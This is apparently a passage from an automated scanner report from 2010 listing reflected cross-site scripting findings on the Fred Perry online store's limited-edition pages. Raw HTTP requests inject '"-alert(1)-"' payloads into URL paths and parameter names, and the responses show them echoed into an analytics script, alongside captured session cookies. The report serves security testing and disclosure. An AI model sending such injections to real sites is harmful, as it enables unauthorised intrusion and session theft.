GET /limited-edition/women2eebd"-alert(1)-"d37ff8bf82b/knitwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=9br5o47e55n53418d1e1jtmcq2; expires=Tue, 09-Nov-2010 17:20:18 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women2eebd"-alert(1)-"d37ff8bf82b/knitwear/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa892"-alert(1)-"6112ce3a2d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/knitwearaa892"-alert(1)-"6112ce3a2d3/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=47h3pa66t9h7jtmvakhcjfjb07; expires=Tue, 09-Nov-2010 17:20:42 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/knitwearaa892"-alert(1)-"6112ce3a2d3/"); //]]> ...[SNIP]...
1.181. http://www.fredperry.com/limited-edition/women/knitwear/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/knitwear/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fee8d"-alert(1)-"5f12871407c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/knitwear/?fee8d"-alert(1)-"5f12871407c=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/knitwear/?fee8d"-alert(1)-"5f12871407c=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 125f5"-alert(1)-"339b310c262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition125f5"-alert(1)-"339b310c262/women/new-styles/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=s8g9vok5absmav3sjkv3m79d95; expires=Tue, 09-Nov-2010 17:15:07 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition125f5"-alert(1)-"339b310c262/women/new-styles/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c00d"-alert(1)-"3d2b6026ddb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women5c00d"-alert(1)-"3d2b6026ddb/new-styles/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=7mc5c6ge65unqhrcrhbm1lg3g5; expires=Tue, 09-Nov-2010 17:15:31 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women5c00d"-alert(1)-"3d2b6026ddb/new-styles/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76af3"-alert(1)-"e9741ad8f26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/new-styles76af3"-alert(1)-"e9741ad8f26/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=i83m7vgo6klbkt13pvu7ha0sf3; expires=Tue, 09-Nov-2010 17:15:59 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/new-styles76af3"-alert(1)-"e9741ad8f26/"); //]]> ...[SNIP]...
1.185. http://www.fredperry.com/limited-edition/women/new-styles/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/new-styles/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ea62"-alert(1)-"7d2c500e6f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/new-styles/?5ea62"-alert(1)-"7d2c500e6f1=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24fed"-alert(1)-"4376cc421d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition24fed"-alert(1)-"4376cc421d6/women/shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:18:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=3r53k1uir2nojsecqug4val937; expires=Tue, 09-Nov-2010 17:18:54 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition24fed"-alert(1)-"4376cc421d6/women/shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19601"-alert(1)-"aa600d1ea66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women19601"-alert(1)-"aa600d1ea66/shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:19:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=bqm75d6efa21b78apj8pid2ip4; expires=Tue, 09-Nov-2010 17:19:13 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women19601"-alert(1)-"aa600d1ea66/shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4ef"-alert(1)-"8619217da8a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/shirts6b4ef"-alert(1)-"8619217da8a/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:19:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=28ijbt4pspljfvkbg1krqmmf86; expires=Tue, 09-Nov-2010 17:19:41 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/shirts6b4ef"-alert(1)-"8619217da8a/"); //]]> ...[SNIP]...
1.189. http://www.fredperry.com/limited-edition/women/shirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/shirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3b5"-alert(1)-"13b0e4c6bfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/shirts/?aa3b5"-alert(1)-"13b0e4c6bfd=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/shirts/?aa3b5"-alert(1)-"13b0e4c6bfd=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3425"-alert(1)-"58b57485b7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-editiona3425"-alert(1)-"58b57485b7c/women/shorts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:16:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=b9c99toatbkak9qdctggl2tgm1; expires=Tue, 09-Nov-2010 17:16:03 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-editiona3425"-alert(1)-"58b57485b7c/women/shorts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21758"-alert(1)-"0c629b616a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women21758"-alert(1)-"0c629b616a9/shorts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:16:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=oeoprbob6gvfv4g1sfdilovuj6; expires=Tue, 09-Nov-2010 17:16:18 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women21758"-alert(1)-"0c629b616a9/shorts/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 987c1"-alert(1)-"18bec130932 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/shorts987c1"-alert(1)-"18bec130932/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:16:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=9c2tjvetsb3nuc82tgrnhdpph7; expires=Tue, 09-Nov-2010 17:16:37 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/shorts987c1"-alert(1)-"18bec130932/"); //]]> ...[SNIP]...
1.193. http://www.fredperry.com/limited-edition/women/shorts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/shorts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee86e"-alert(1)-"ca169360927 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/shorts/?ee86e"-alert(1)-"ca169360927=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/shorts/?ee86e"-alert(1)-"ca169360927=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6071"-alert(1)-"d29439e175 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-editione6071"-alert(1)-"d29439e175/women/skirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=sij4c4sr0g9sobd42obfm75li6; expires=Tue, 09-Nov-2010 17:14:49 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-editione6071"-alert(1)-"d29439e175/women/skirts/"); //]]> ...[SNIP]...
